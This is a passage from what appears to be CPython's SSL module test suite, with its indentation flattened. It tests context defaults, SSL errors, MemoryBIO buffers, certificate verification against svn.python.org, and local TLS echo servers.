self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
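# MemoryBIOTests exercises the ssl.MemoryBIO buffer object on its own:
# read/write round-trips, EOF signalling, the pending byte count, and the
# accepted buffer types.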
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
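# NetworkedTests talks to external hosts (mainly svn.python.org) and wraps
# each test in support.transient_internet() so transient network problems
# skip the test instead of failing it.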
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm changed between OpenSSL 0.9.8n
# and 1.0.0; as a result, the capath directory must contain both
# versions of each certificate (same content, different filename) for
# this test to be portable across OpenSSL releases.
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
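# NetworkedBIOTests drives an SSLObject created with wrap_bio() against a
# real server, shuttling bytes between the socket and the MemoryBIO pair
# by hand in ssl_io_loop().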
class NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) and, depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
# Note that we get a spurious -1/SSL_ERROR_SYSCALL for
# non-blocking IO. The SSL_shutdown manpage hints at this.
# It *should* be safe to just ignore SSL_ERROR_SYSCALL because
# with a memory BIO there are no syscalls (for IO at least).
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_handshake(self):
with support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'svn.python.org')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
with support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
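# ThreadedEchoServer runs a TLS echo server in a background thread; each
# accepted connection gets its own ConnectionHandler thread, which also
# understands the STARTTLS/ENDTLS/over commands used by the tests below.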
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_protocols.append(self.sslconn.selected_npn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
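# AsyncoreEchoServer is an alternative echo server built on
# asyncore.dispatcher, used by test_asyncore_server to exercise the
# non-blocking handshake path.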
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_npn_protocols'] = server.selected_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
